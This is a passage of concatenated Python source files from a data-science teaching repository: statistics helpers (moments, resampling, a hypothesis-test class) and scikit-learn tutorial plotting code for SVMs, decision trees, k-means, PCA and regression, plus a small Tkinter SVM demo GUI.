RawMoment(xs, k): """Computes the kth raw moment of xs. """ return sum(x**k for x in xs) / len(xs) def CentralMoment(xs, k): """Computes the kth central moment of xs. """ mean = RawMoment(xs, 1) return sum((x - mean)**k for x in xs) / len(xs) def StandardizedMoment(xs, k): """Computes the kth standardized moment of xs. """ var = CentralMoment(xs, 2) std = math.sqrt(var) return CentralMoment(xs, k) / std**k def Skewness(xs): """Computes skewness. """ return StandardizedMoment(xs, 3) def Median(xs): """Computes the median (50th percentile) of a sequence. xs: sequence or anything else that can initialize a Cdf returns: float """ cdf = Cdf(xs) return cdf.Value(0.5) def IQR(xs): """Computes the interquartile of a sequence. xs: sequence or anything else that can initialize a Cdf returns: pair of floats """ cdf = Cdf(xs) return cdf.Value(0.25), cdf.Value(0.75) def PearsonMedianSkewness(xs): """Computes the Pearson median skewness. """ median = Median(xs) mean = RawMoment(xs, 1) var = CentralMoment(xs, 2) std = math.sqrt(var) gp = 3 * (mean - median) / std return gp class FixedWidthVariables(object): """Represents a set of variables in a fixed width file.""" def __init__(self, variables, index_base=0): """Initializes. variables: DataFrame index_base: are the indices 0 or 1 based? Attributes: colspecs: list of (start, end) index tuples names: list of string variable names """ self.variables = variables # note: by default, subtract 1 from colspecs self.colspecs = variables[['start', 'end']] - index_base # convert colspecs to a list of pair of int self.colspecs = self.colspecs.astype(np.int).values.tolist() self.names = variables['name'] def ReadFixedWidth(self, filename, **options): """Reads a fixed width ASCII file. filename: string filename returns: DataFrame """ df = pandas.read_fwf(filename, colspecs=self.colspecs, names=self.names, **options) return df def ReadStataDct(dct_file, **options): """Reads a Stata dictionary file. dct_file: string filename options: dict of options passed to open() returns: FixedWidthVariables object """ type_map = dict(byte=int, int=int, long=int, float=float, double=float) var_info = [] for line in open(dct_file, **options): match = re.search( r'_column\(([^)]*)\)', line) if match: start = int(match.group(1)) t = line.split() vtype, name, fstring = t[1:4] name = name.lower() if vtype.startswith('str'): vtype = str else: vtype = type_map[vtype] long_desc = ' '.join(t[4:]).strip('"') var_info.append((start, vtype, name, fstring, long_desc)) columns = ['start', 'type', 'name', 'fstring', 'desc'] variables = pandas.DataFrame(var_info, columns=columns) # fill in the end column by shifting the start column variables['end'] = variables.start.shift(-1) variables.loc[len(variables)-1, 'end'] = 0 dct = FixedWidthVariables(variables, index_base=1) return dct def Resample(xs, n=None): """Draw a sample from xs with the same length as xs. xs: sequence n: sample size (default: len(xs)) returns: NumPy array """ if n is None: n = len(xs) return np.random.choice(xs, n, replace=True) def SampleRows(df, nrows, replace=False): """Choose a sample of rows from a DataFrame. df: DataFrame nrows: number of rows replace: whether to sample with replacement returns: DataDf """ indices = np.random.choice(df.index, nrows, replace=replace) sample = df.loc[indices] return sample def ResampleRows(df): """Resamples rows from a DataFrame. df: DataFrame returns: DataFrame """ return SampleRows(df, len(df), replace=True) def ResampleRowsWeighted(df, column='finalwgt'): """Resamples a DataFrame using probabilities proportional to given column. df: DataFrame column: string column name to use as weights returns: DataFrame """ weights = df[column] cdf = Cdf(dict(weights)) indices = cdf.Sample(len(weights)) sample = df.loc[indices] return sample def PercentileRow(array, p): """Selects the row from a sorted array that maps to percentile p. p: float 0--100 returns: NumPy array (one row) """ rows, cols = array.shape index = int(rows * p / 100) return array[index,] def PercentileRows(ys_seq, percents): """Given a collection of lines, selects percentiles along vertical axis. For example, if ys_seq contains simulation results like ys as a function of time, and percents contains (5, 95), the result would be a 90% CI for each vertical slice of the simulation results. ys_seq: sequence of lines (y values) percents: list of percentiles (0-100) to select returns: list of NumPy arrays, one for each percentile """ nrows = len(ys_seq) ncols = len(ys_seq[0]) array = np.zeros((nrows, ncols)) for i, ys in enumerate(ys_seq): array[i,] = ys array = np.sort(array, axis=0) rows = [PercentileRow(array, p) for p in percents] return rows def Smooth(xs, sigma=2, **options): """Smooths a NumPy array with a Gaussian filter. xs: sequence sigma: standard deviation of the filter """ return ndimage.filters.gaussian_filter1d(xs, sigma, **options) class HypothesisTest(object): """Represents a hypothesis test.""" def __init__(self, data): """Initializes. data: data in whatever form is relevant """ self.data = data self.MakeModel() self.actual = self.TestStatistic(data) self.test_stats = None self.test_cdf = None def PValue(self, iters=1000): """Computes the distribution of the test statistic and p-value. iters: number of iterations returns: float p-value """ self.test_stats = [self.TestStatistic(self.RunModel()) for _ in range(iters)] self.test_cdf = Cdf(self.test_stats) count = sum(1 for x in self.test_stats if x >= self.actual) return count / iters def MaxTestStat(self): """Returns the largest test statistic seen during simulations. """ return max(self.test_stats) def PlotCdf(self, label=None): """Draws a Cdf with vertical lines at the observed test stat. """ def VertLine(x): """Draws a vertical line at x.""" thinkplot.Plot([x, x], [0, 1], color='0.8') VertLine(self.actual) thinkplot.Cdf(self.test_cdf, label=label) def TestStatistic(self, data): """Computes the test statistic. data: data in whatever form is relevant """ raise UnimplementedMethodException() def MakeModel(self): """Build a model of the null hypothesis. """ pass def RunModel(self): """Run the model of the null hypothesis. returns: simulated data """ raise UnimplementedMethodException() def main(): pass if __name__ == '__main__': main() File: scikit-learn/__init__.py File: scikit-learn/fig_code/sgd_separator.py import numpy as np import matplotlib.pyplot as plt from sklearn.linear_model import SGDClassifier from sklearn.datasets.samples_generator import make_blobs def plot_sgd_separator(): # we create 50 separable points X, Y = make_blobs(n_samples=50, centers=2, random_state=0, cluster_std=0.60) # fit the model clf = SGDClassifier(loss="hinge", alpha=0.01, n_iter=200, fit_intercept=True) clf.fit(X, Y) # plot the line, the points, and the nearest vectors to the plane xx = np.linspace(-1, 5, 10) yy = np.linspace(-1, 5, 10) X1, X2 = np.meshgrid(xx, yy) Z = np.empty(X1.shape) for (i, j), val in np.ndenumerate(X1): x1 = val x2 = X2[i, j] p = clf.decision_function([x1, x2]) Z[i, j] = p[0] levels = [-1.0, 0.0, 1.0] linestyles = ['dashed', 'solid', 'dashed'] colors = 'k' ax = plt.axes() ax.contour(X1, X2, Z, levels, colors=colors, linestyles=linestyles) ax.scatter(X[:, 0], X[:, 1], c=Y, cmap=plt.cm.Paired) ax.axis('tight') if __name__ == '__main__': plot_sgd_separator() plt.show() File: scikit-learn/fig_code/__init__.py from .data import * from .figures import * from .sgd_separator import plot_sgd_separator from .linear_regression import plot_linear_regression from .helpers import plot_iris_knn File: scikit-learn/fig_code/ML_flow_chart.py """ Tutorial Diagrams ----------------- This script plots the flow-charts used in the scikit-learn tutorials. """ import numpy as np import pylab as pl from matplotlib.patches import Circle, Rectangle, Polygon, Arrow, FancyArrow def create_base(box_bg = '#CCCCCC', arrow1 = '#88CCFF', arrow2 = '#88FF88', supervised=True): fig = pl.figure(figsize=(9, 6), facecolor='w') ax = pl.axes((0, 0, 1, 1), xticks=[], yticks=[], frameon=False) ax.set_xlim(0, 9) ax.set_ylim(0, 6) patches = [Rectangle((0.3, 3.6), 1.5, 1.8, zorder=1, fc=box_bg), Rectangle((0.5, 3.8), 1.5, 1.8, zorder=2, fc=box_bg), Rectangle((0.7, 4.0), 1.5, 1.8, zorder=3, fc=box_bg), Rectangle((2.9, 3.6), 0.2, 1.8, fc=box_bg), Rectangle((3.1, 3.8), 0.2, 1.8, fc=box_bg), Rectangle((3.3, 4.0), 0.2, 1.8, fc=box_bg), Rectangle((0.3, 0.2), 1.5, 1.8, fc=box_bg), Rectangle((2.9, 0.2), 0.2, 1.8, fc=box_bg), Circle((5.5, 3.5), 1.0, fc=box_bg), Polygon([[5.5, 1.7], [6.1, 1.1], [5.5, 0.5], [4.9, 1.1]], fc=box_bg), FancyArrow(2.3, 4.6, 0.35, 0, fc=arrow1, width=0.25, head_width=0.5, head_length=0.2), FancyArrow(3.75, 4.2, 0.5, -0.2, fc=arrow1, width=0.25, head_width=0.5, head_length=0.2), FancyArrow(5.5, 2.4, 0, -0.4, fc=arrow1, width=0.25, head_width=0.5, head_length=0.2), FancyArrow(2.0, 1.1, 0.5, 0, fc=arrow2, width=0.25, head_width=0.5, head_length=0.2), FancyArrow(3.3, 1.1, 1.3, 0, fc=arrow2, width=0.25, head_width=0.5, head_length=0.2), FancyArrow(6.2, 1.1, 0.8, 0, fc=arrow2, width=0.25, head_width=0.5, head_length=0.2)] if supervised: patches += [Rectangle((0.3, 2.4), 1.5, 0.5, zorder=1, fc=box_bg), Rectangle((0.5, 2.6), 1.5, 0.5, zorder=2, fc=box_bg), Rectangle((0.7, 2.8), 1.5, 0.5, zorder=3, fc=box_bg), FancyArrow(2.3, 2.9, 2.0, 0, fc=arrow1, width=0.25, head_width=0.5, head_length=0.2), Rectangle((7.3, 0.85), 1.5, 0.5, fc=box_bg)] else: patches += [Rectangle((7.3, 0.2), 1.5, 1.8, fc=box_bg)] for p in patches: ax.add_patch(p) pl.text(1.45, 4.9, "Training\nText,\nDocuments,\nImages,\netc.", ha='center', va='center', fontsize=14) pl.text(3.6, 4.9, "Feature\nVectors", ha='left', va='center', fontsize=14) pl.text(5.5, 3.5, "Machine\nLearning\nAlgorithm", ha='center', va='center', fontsize=14) pl.text(1.05, 1.1, "New Text,\nDocument,\nImage,\netc.", ha='center', va='center', fontsize=14) pl.text(3.3, 1.7, "Feature\nVector", ha='left', va='center', fontsize=14) pl.text(5.5, 1.1, "Predictive\nModel", ha='center', va='center', fontsize=12) if supervised: pl.text(1.45, 3.05, "Labels", ha='center', va='center', fontsize=14) pl.text(8.05, 1.1, "Expected\nLabel", ha='center', va='center', fontsize=14) pl.text(8.8, 5.8, "Supervised Learning Model", ha='right', va='top', fontsize=18) else: pl.text(8.05, 1.1, "Likelihood\nor Cluster ID\nor Better\nRepresentation", ha='center', va='center', fontsize=12) pl.text(8.8, 5.8, "Unsupervised Learning Model", ha='right', va='top', fontsize=18) def plot_supervised_chart(annotate=False): create_base(supervised=True) if annotate: fontdict = dict(color='r', weight='bold', size=14) pl.text(1.9, 4.55, 'X = vec.fit_transform(input)', fontdict=fontdict, rotation=20, ha='left', va='bottom') pl.text(3.7, 3.2, 'clf.fit(X, y)', fontdict=fontdict, rotation=20, ha='left', va='bottom') pl.text(1.7, 1.5, 'X_new = vec.transform(input)', fontdict=fontdict, rotation=20, ha='left', va='bottom') pl.text(6.1, 1.5, 'y_new = clf.predict(X_new)', fontdict=fontdict, rotation=20, ha='left', va='bottom') def plot_unsupervised_chart(): create_base(supervised=False) if __name__ == '__main__': plot_supervised_chart(False) plot_supervised_chart(True) plot_unsupervised_chart() pl.show() File: scikit-learn/fig_code/figures.py import numpy as np import matplotlib.pyplot as plt import warnings def plot_venn_diagram(): fig, ax = plt.subplots(subplot_kw=dict(frameon=False, xticks=[], yticks=[])) ax.add_patch(plt.Circle((0.3, 0.3), 0.3, fc='red', alpha=0.5)) ax.add_patch(plt.Circle((0.6, 0.3), 0.3, fc='blue', alpha=0.5)) ax.add_patch(plt.Rectangle((-0.1, -0.1), 1.1, 0.8, fc='none', ec='black')) ax.text(0.2, 0.3, '$x$', size=30, ha='center', va='center') ax.text(0.7, 0.3, '$y$', size=30, ha='center', va='center') ax.text(0.0, 0.6, '$I$', size=30) ax.axis('equal') def plot_example_decision_tree(): fig = plt.figure(figsize=(10, 4)) ax = fig.add_axes([0, 0, 0.8, 1], frameon=False, xticks=[], yticks=[]) ax.set_title('Example Decision Tree: Animal Classification', size=24) def text(ax, x, y, t, size=20, **kwargs): ax.text(x, y, t, ha='center', va='center', size=size, bbox=dict(boxstyle='round', ec='k', fc='w'), **kwargs) text(ax, 0.5, 0.9, "How big is\nthe animal?", 20) text(ax, 0.3, 0.6, "Does the animal\nhave horns?", 18) text(ax, 0.7, 0.6, "Does the animal\nhave two legs?", 18) text(ax, 0.12, 0.3, "Are the horns\nlonger than 10cm?", 14) text(ax, 0.38, 0.3, "Is the animal\nwearing a collar?", 14) text(ax, 0.62, 0.3, "Does the animal\nhave wings?", 14) text(ax, 0.88, 0.3, "Does the animal\nhave a tail?", 14) text(ax, 0.4, 0.75, "> 1m", 12, alpha=0.4) text(ax, 0.6, 0.75, "< 1m", 12, alpha=0.4) text(ax, 0.21, 0.45, "yes", 12, alpha=0.4) text(ax, 0.34, 0.45, "no", 12, alpha=0.4) text(ax, 0.66, 0.45, "yes", 12, alpha=0.4) text(ax, 0.79, 0.45, "no", 12, alpha=0.4) ax.plot([0.3, 0.5, 0.7], [0.6, 0.9, 0.6], '-k') ax.plot([0.12, 0.3, 0.38], [0.3, 0.6, 0.3], '-k') ax.plot([0.62, 0.7, 0.88], [0.3, 0.6, 0.3], '-k') ax.plot([0.0, 0.12, 0.20], [0.0, 0.3, 0.0], '--k') ax.plot([0.28, 0.38, 0.48], [0.0, 0.3, 0.0], '--k') ax.plot([0.52, 0.62, 0.72], [0.0, 0.3, 0.0], '--k') ax.plot([0.8, 0.88, 1.0], [0.0, 0.3, 0.0], '--k') ax.axis([0, 1, 0, 1]) def visualize_tree(estimator, X, y, boundaries=True, xlim=None, ylim=None): estimator.fit(X, y) if xlim is None: xlim = (X[:, 0].min() - 0.1, X[:, 0].max() + 0.1) if ylim is None: ylim = (X[:, 1].min() - 0.1, X[:, 1].max() + 0.1) x_min, x_max = xlim y_min, y_max = ylim xx, yy = np.meshgrid(np.linspace(x_min, x_max, 100), np.linspace(y_min, y_max, 100)) Z = estimator.predict(np.c_[xx.ravel(), yy.ravel()]) # Put the result into a color plot Z = Z.reshape(xx.shape) plt.figure() plt.pcolormesh(xx, yy, Z, alpha=0.2, cmap='rainbow') plt.clim(y.min(), y.max()) # Plot also the training points plt.scatter(X[:, 0], X[:, 1], c=y, s=50, cmap='rainbow') plt.axis('off') plt.xlim(x_min, x_max) plt.ylim(y_min, y_max) plt.clim(y.min(), y.max()) # Plot the decision boundaries def plot_boundaries(i, xlim, ylim): if i < 0: return tree = estimator.tree_ if tree.feature[i] == 0: plt.plot([tree.threshold[i], tree.threshold[i]], ylim, '-k') plot_boundaries(tree.children_left[i], [xlim[0], tree.threshold[i]], ylim) plot_boundaries(tree.children_right[i], [tree.threshold[i], xlim[1]], ylim) elif tree.feature[i] == 1: plt.plot(xlim, [tree.threshold[i], tree.threshold[i]], '-k') plot_boundaries(tree.children_left[i], xlim, [ylim[0], tree.threshold[i]]) plot_boundaries(tree.children_right[i], xlim, [tree.threshold[i], ylim[1]]) if boundaries: plot_boundaries(0, plt.xlim(), plt.ylim()) def plot_tree_interactive(X, y): from sklearn.tree import DecisionTreeClassifier def interactive_tree(depth=1): clf = DecisionTreeClassifier(max_depth=depth, random_state=0) visualize_tree(clf, X, y) from IPython.html.widgets import interact return interact(interactive_tree, depth=[1, 5]) def plot_kmeans_interactive(min_clusters=1, max_clusters=6): from IPython.html.widgets import interact from sklearn.metrics.pairwise import euclidean_distances from sklearn.datasets.samples_generator import make_blobs with warnings.catch_warnings(): warnings.filterwarnings('ignore') X, y = make_blobs(n_samples=300, centers=4, random_state=0, cluster_std=0.60) def _kmeans_step(frame=0, n_clusters=4): rng = np.random.RandomState(2) labels = np.zeros(X.shape[0]) centers = rng.randn(n_clusters, 2) nsteps = frame // 3 for i in range(nsteps + 1): old_centers = centers if i < nsteps or frame % 3 > 0: dist = euclidean_distances(X, centers) labels = dist.argmin(1) if i < nsteps or frame % 3 > 1: centers = np.array([X[labels == j].mean(0) for j in range(n_clusters)]) nans = np.isnan(centers) centers[nans] = old_centers[nans] # plot the data and cluster centers plt.scatter(X[:, 0], X[:, 1], c=labels, s=50, cmap='rainbow', vmin=0, vmax=n_clusters - 1); plt.scatter(old_centers[:, 0], old_centers[:, 1], marker='o', c=np.arange(n_clusters), s=200, cmap='rainbow') plt.scatter(old_centers[:, 0], old_centers[:, 1], marker='o', c='black', s=50) # plot new centers if third frame if frame % 3 == 2: for i in range(n_clusters): plt.annotate('', centers[i], old_centers[i], arrowprops=dict(arrowstyle='->', linewidth=1)) plt.scatter(centers[:, 0], centers[:, 1], marker='o', c=np.arange(n_clusters), s=200, cmap='rainbow') plt.scatter(centers[:, 0], centers[:, 1], marker='o', c='black', s=50) plt.xlim(-4, 4) plt.ylim(-2, 10) if frame % 3 == 1: plt.text(3.8, 9.5, "1. Reassign points to nearest centroid", ha='right', va='top', size=14) elif frame % 3 == 2: plt.text(3.8, 9.5, "2. Update centroids to cluster means", ha='right', va='top', size=14) return interact(_kmeans_step, frame=[0, 50], n_clusters=[min_clusters, max_clusters]) def plot_image_components(x, coefficients=None, mean=0, components=None, imshape=(8, 8), n_components=6, fontsize=12): if coefficients is None: coefficients = x if components is None: components = np.eye(len(coefficients), len(x)) mean = np.zeros_like(x) + mean fig = plt.figure(figsize=(1.2 * (5 + n_components), 1.2 * 2)) g = plt.GridSpec(2, 5 + n_components, hspace=0.3) def show(i, j, x, title=None): ax = fig.add_subplot(g[i, j], xticks=[], yticks=[]) ax.imshow(x.reshape(imshape), interpolation='nearest') if title: ax.set_title(title, fontsize=fontsize) show(slice(2), slice(2), x, "True") approx = mean.copy() show(0, 2, np.zeros_like(x) + mean, r'$\mu$') show(1, 2, approx, r'$1 \cdot \mu$') for i in range(0, n_components): approx = approx + coefficients[i] * components[i] show(0, i + 3, components[i], r'$c_{0}$'.format(i + 1)) show(1, i + 3, approx, r"${0:.2f} \cdot c_{1}$".format(coefficients[i], i + 1)) plt.gca().text(0, 1.05, '$+$', ha='right', va='bottom', transform=plt.gca().transAxes, fontsize=fontsize) show(slice(2), slice(-2, None), approx, "Approx") def plot_pca_interactive(data, n_components=6): from sklearn.decomposition import PCA from IPython.html.widgets import interact pca = PCA(n_components=n_components) Xproj = pca.fit_transform(data) def show_decomp(i=0): plot_image_components(data[i], Xproj[i], pca.mean_, pca.components_) interact(show_decomp, i=(0, data.shape[0] - 1)); File: scikit-learn/fig_code/svm_gui.py """ ========== Libsvm GUI ========== A simple graphical frontend for Libsvm mainly intended for didactic purposes. You can create data points by point and click and visualize the decision region induced by different kernels and parameter settings. To create positive examples click the left mouse button; to create negative examples click the right button. If all examples are from the same class, it uses a one-class SVM. """ from __future__ import division, print_function print(__doc__) # Author: Peter Prettenhoer <[email protected]> # # License: BSD 3 clause import matplotlib matplotlib.use('TkAgg') from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg from matplotlib.backends.backend_tkagg import NavigationToolbar2TkAgg from matplotlib.figure import Figure from matplotlib.contour import ContourSet import Tkinter as Tk import sys import numpy as np from sklearn import svm from sklearn.datasets import dump_svmlight_file from sklearn.externals.six.moves import xrange y_min, y_max = -50, 50 x_min, x_max = -50, 50 class Model(object): """The Model which hold the data. It implements the observable in the observer pattern and notifies the registered observers on change event. """ def __init__(self): self.observers = [] self.surface = None self.data = [] self.cls = None self.surface_type = 0 def changed(self, event): """Notify the observers. """ for observer in self.observers: observer.update(event, self) def add_observer(self, observer): """Register an observer. """ self.observers.append(observer) def set_surface(self, surface): self.surface = surface def dump_svmlight_file(self, file): data = np.array(self.data) X = data[:, 0:2] y = data[:, 2] dump_svmlight_file(X, y, file) class Controller(object): def __init__(self, model): self.model = model self.kernel = Tk.IntVar() self.surface_type = Tk.IntVar() # Whether or not a model has been fitted self.fitted = False def fit(self): print("fit the model") train = np.array(self.model.data) X = train[:, 0:2] y = train[:, 2] C = float(self.complexity.get()) gamma = float(self.gamma.get()) coef0 = float(self.coef0.get()) degree = int(self.degree.get()) kernel_map = {0: "linear", 1: "rbf", 2: "poly"} if len(np.unique(y)) == 1: clf = svm.OneClassSVM(kernel=kernel_map[self.kernel.get()], gamma=gamma, coef0=coef0, degree=degree) clf.fit(X) else: clf = svm.SVC(kernel=kernel_map[self.kernel.get()], C=C, gamma=gamma, coef0=coef0, degree=degree) clf.fit(X, y) if hasattr(clf, 'score'): print("Accuracy:", clf.score(X, y) * 100) X1, X2, Z = self.decision_surface(clf) self.model.clf = clf self.model.set_surface((X1, X2, Z)) self.model.surface_type = self.surface_type.get() self.fitted = True self.model.changed("surface") def decision_surface(self, cls): delta = 1 x = np.arange(x_min, x_max + delta, delta) y = np.arange(y_min, y_max + delta, delta) X1, X2 = np.meshgrid(x, y) Z = cls.decision_function(np.c_[X1.ravel(), X2.ravel()]) Z = Z.reshape(X1.shape) return X1, X2, Z def clear_data(self): self.model.data = [] self.fitted = False self.model.changed("clear") def add_example(self, x, y, label): self.model.data.append((x, y, label)) self.model.changed("example_added") # update decision surface if already fitted. self.refit() def refit(self): """Refit the model if already fitted. """ if self.fitted: self.fit() class View(object): """Test docstring. """ def __init__(self, root, controller): f = Figure() ax = f.add_subplot(111) ax.set_xticks([]) ax.set_yticks([]) ax.set_xlim((x_min, x_max)) ax.set_ylim((y_min, y_max)) canvas = FigureCanvasTkAgg(f, master=root) canvas.show() canvas.get_tk_widget().pack(side=Tk.TOP, fill=Tk.BOTH, expand=1) canvas._tkcanvas.pack(side=Tk.TOP, fill=Tk.BOTH, expand=1) canvas.mpl_connect('key_press_event', self.onkeypress) canvas.mpl_connect('key_release_event', self.onkeyrelease) canvas.mpl_connect('button_press_event', self.onclick) toolbar = NavigationToolbar2TkAgg(canvas, root) toolbar.update() self.shift_down = False self.controllbar = ControllBar(root, controller) self.f = f self.ax = ax self.canvas = canvas self.controller = controller self.contours = [] self.c_labels = None self.plot_kernels() def plot_kernels(self): self.ax.text(-50, -60, "Linear: $u^T v$") self.ax.text(-20, -60, "RBF: $\exp (-\gamma \| u-v \|^2)$") self.ax.text(10, -60, "Poly: $(\gamma \, u^T v + r)^d$") def onkeypress(self, event): if event.key == "shift": self.shift_down = True def onkeyrelease(self, event): if event.key == "shift": self.shift_down = False def onclick(self, event): if event.xdata and event.ydata: if self.shift_down or event.button == 3: self.controller.add_example(event.xdata, event.ydata, -1) elif event.button == 1: self.controller.add_example(event.xdata, event.ydata, 1) def update_example(self, model, idx): x, y, l = model.data[idx] if l == 1: color = 'w' elif l == -1: color = 'k' self.ax.plot([x], [y], "%so" % color, scalex=0.0, scaley=0.0) def update(self, event, model): if event == "examples_loaded": for i in xrange(len(model.data)): self.update_example(model, i) if event == "example_added": self.update_example(model, -1) if event == "clear": self.ax.clear() self.ax.set_xticks([]) self.ax.set_yticks([]) self.contours = [] self.c_labels = None self.plot_kernels() if event == "surface": self.remove_surface() self.plot_support_vectors(model.clf.support_vectors_) self.plot_decision_surface(model.surface, model.surface_type) self.canvas.draw() def remove_surface(self): """Remove old decision surface.""" if len(self.contours) > 0: for contour in self.contours: if isinstance(contour, ContourSet): for lineset in contour.collections: lineset.remove() else: contour.remove() self.contours = [] def plot_support_vectors(self, support_vectors): """Plot the support vectors by placing circles over the corresponding data points and adds the circle collection to the contours list.""" cs = self.ax.scatter(support_vectors[:, 0], support_vectors[:, 1], s=80, edgecolors="k", facecolors="none") self.contours.append(cs) def plot_decision_surface(self, surface, type): X1, X2, Z = surface if type == 0: levels = [-1.0, 0.0, 1.0] linestyles = ['dashed', 'solid', 'dashed'] colors = 'k' self.contours.append(self.ax.contour(X1, X2, Z, levels, colors=colors, linestyles=linestyles)) elif type == 1: self.contours.append(self.ax.contourf(X1, X2, Z, 10, cmap=matplotlib.cm.bone, origin='lower', alpha=0.85)) self.contours.append(self.ax.contour(X1, X2, Z, [0.0], colors='k', linestyles=['solid'])) else: raise ValueError("surface type unknown") class ControllBar(object): def __init__(self, root, controller): fm = Tk.Frame(root) kernel_group = Tk.Frame(fm) Tk.Radiobutton(kernel_group, text="Linear", variable=controller.kernel, value=0, command=controller.refit).pack(anchor=Tk.W) Tk.Radiobutton(kernel_group, text="RBF", variable=controller.kernel, value=1, command=controller.refit).pack(anchor=Tk.W) Tk.Radiobutton(kernel_group, text="Poly", variable=controller.kernel, value=2, command=controller.refit).pack(anchor=Tk.W) kernel_group.pack(side=Tk.LEFT) valbox = Tk.Frame(fm) controller.complexity = Tk.StringVar() controller.complexity.set("1.0") c = Tk.Frame(valbox) Tk.Label(c, text="C:", anchor="e", width=7).pack(side=Tk.LEFT) Tk.Entry(c, width=6, textvariable=controller.complexity).pack( side=Tk.LEFT) c.pack() controller.gamma = Tk.StringVar() controller.gamma.set("0.01") g = Tk.Frame(valbox) Tk.Label(g, text="gamma:", anchor="e", width=7).pack(side=Tk.LEFT) Tk.Entry(g, width=6, textvariable=controller.gamma).pack(side=Tk.LEFT) g.pack() controller.degree = Tk.StringVar() controller.degree.set("3") d = Tk.Frame(valbox) Tk.Label(d, text="degree:", anchor="e", width=7).pack(side=Tk.LEFT) Tk.Entry(d, width=6, textvariable=controller.degree).pack(side=Tk.LEFT) d.pack() controller.coef0 = Tk.StringVar() controller.coef0.set("0") r = Tk.Frame(valbox) Tk.Label(r, text="coef0:", anchor="e", width=7).pack(side=Tk.LEFT) Tk.Entry(r, width=6, textvariable=controller.coef0).pack(side=Tk.LEFT) r.pack() valbox.pack(side=Tk.LEFT) cmap_group = Tk.Frame(fm) Tk.Radiobutton(cmap_group, text="Hyperplanes", variable=controller.surface_type, value=0, command=controller.refit).pack(anchor=Tk.W) Tk.Radiobutton(cmap_group, text="Surface", variable=controller.surface_type, value=1, command=controller.refit).pack(anchor=Tk.W) cmap_group.pack(side=Tk.LEFT) train_button = Tk.Button(fm, text='Fit', width=5, command=controller.fit) train_button.pack() fm.pack(side=Tk.LEFT) Tk.Button(fm, text='Clear', width=5, command=controller.clear_data).pack(side=Tk.LEFT) def get_parser(): from optparse import OptionParser op = OptionParser() op.add_option("--output", action="store", type="str", dest="output", help="Path where to dump data.") return op def main(argv): op = get_parser() opts, args = op.parse_args(argv[1:]) root = Tk.Tk() model = Model() controller = Controller(model) root.wm_title("Scikit-learn Libsvm GUI") view = View(root, controller) model.add_observer(view) Tk.mainloop() if opts.output: model.dump_svmlight_file(opts.output) if __name__ == "__main__": main(sys.argv) File: scikit-learn/fig_code/linear_regression.py import numpy as np import matplotlib.pyplot as plt from sklearn.linear_model import LinearRegression def plot_linear_regression(): a = 0.5 b = 1.0 # x from 0 to 10 x = 30 * np.random.random(20) # y = a*x + b with noise y = a * x + b + np.random.normal(size=x.shape) # create a linear regression classifier clf = LinearRegression() clf.fit(x[:, None], y) # predict y from the data x_new = np.linspace(0, 30, 100) y_new = clf.predict(x_new[:, None]) # plot the results ax = plt.axes() ax.scatter(x, y) ax.plot(x_new, y_new) ax.set_xlabel('x') ax.set_ylabel('y') ax.axis('tight') if __name__ == '__main__': plot_linear_regression() plt.show() File: scikit-learn/fig_code/helpers.py """ Small helpers for code that is not shown in the notebooks """ from sklearn import neighbors, datasets, linear_model import pylab as pl import numpy as np from matplotlib.colors import ListedColormap # Create color maps for 3-class classification problem, as with iris cmap_light = ListedColormap(['#FFAAAA', '#AAFFAA', '#AAAAFF']) cmap_bold = ListedColormap(['#FF0000', '#00FF00', '#0000FF']) def plot_iris_knn(): iris = datasets.load_iris() X = iris.data[:, :2] # we only take the first two features. We could # avoid this ugly slicing by using a two-dim dataset y = iris.target knn = neighbors.KNeighborsClassifier(n_neighbors=5) knn.fit(X, y) x_min, x_max = X[:, 0].min() - .1, X[:, 0].max() + .1 y_min, y_max = X[:, 1].min() - .1, X[:, 1].max() + .1 xx, yy = np.meshgrid(np.linspace(x_min, x_max, 100), np.linspace(y_min, y_max, 100)) Z = knn.predict(np.c_[xx.ravel(), yy.ravel()]) # Put the result into a color plot Z = Z.reshape(xx.shape) pl.figure() pl.pcolormesh(xx, yy, Z, cmap=cmap_light) # Plot also the training points pl.scatter(X[:, 0], X[:, 1], c=y, cmap=cmap_bold) pl.xlabel('sepal length (cm)') pl.ylabel('sepal width (cm)') pl.axis('tight') def plot_polynomial_regression(): rng = np.random.RandomState(0) x = 2*rng.rand(100) - 1 f = lambda t: 1.2 * t**2 + .1 * t**3 - .4 * t **5 - .5 * t ** 9 y = f(x) + .4 * rng.normal(size=100) x_test = np.linspace(-1, 1, 100) pl.figure() pl.scatter(x, y, s=4) X = np.array([x**i for i in range(5)]).T X_test = np.array([x_test**i for i in range(5)]).T regr = linear_model.LinearRegression() regr.fit(X, y) pl.plot(x_test, regr.predict(X_test), label='4th order') X = np.array([x**i for i in range(10)]).T X_test = np.array([x_test**i for i in range(10)]).T regr = linear_model.LinearRegression() regr.fit(X, y) pl.plot(x_test, regr.predict(X_test), label='9th order') pl.legend(loc='best') pl.axis('tight') pl.title('Fitting a 4th and a 9th order polynomial') pl.figure() pl.scatter(x, y, s=4) pl.plot(x_test, f(x_test), label="truth") pl.axis('tight') pl.title('Ground truth (9th order polynomial)') File: scikit-learn/fig_code/data.py import numpy as np def linear_data_sample(N=40, rseed=0, m=3, b=-2): rng = np.random.RandomState(rseed) x = 10 * rng.rand(N) dy = m / 2 * (1 + rng.rand(N)) y = m * x + b + dy * rng.randn(N) return (x, y, dy) def linear_data_sample_big_errs(N=40, rseed=0, m=3, b=-2): rng = np.random.RandomState(rseed) x = 10 * rng.rand(N) dy = m / 2 * (1 + rng.rand(N)) dy[20:25] *= 10 y = m * x + b + dy * rng.randn(N) return (x, y, dy) def sample_light_curve(phased=True): from astroML.datasets import fetch_LINEAR_sample data = fetch_LINEAR_sample() t, y, dy = data[18525697].T if phased: P_best = 0.580313015651 t /= P_best return (t, y, dy) def sample_light_curve_2(phased=True): from astroML.datasets import fetch_LINEAR_sample data = fetch_LINEAR_sample() t, y, dy = data[10022663].T if phased: P_best = 0.61596079804 t /= P_best return (t, y, dy) File: spark/__init__.py File: pandas/__init__.py
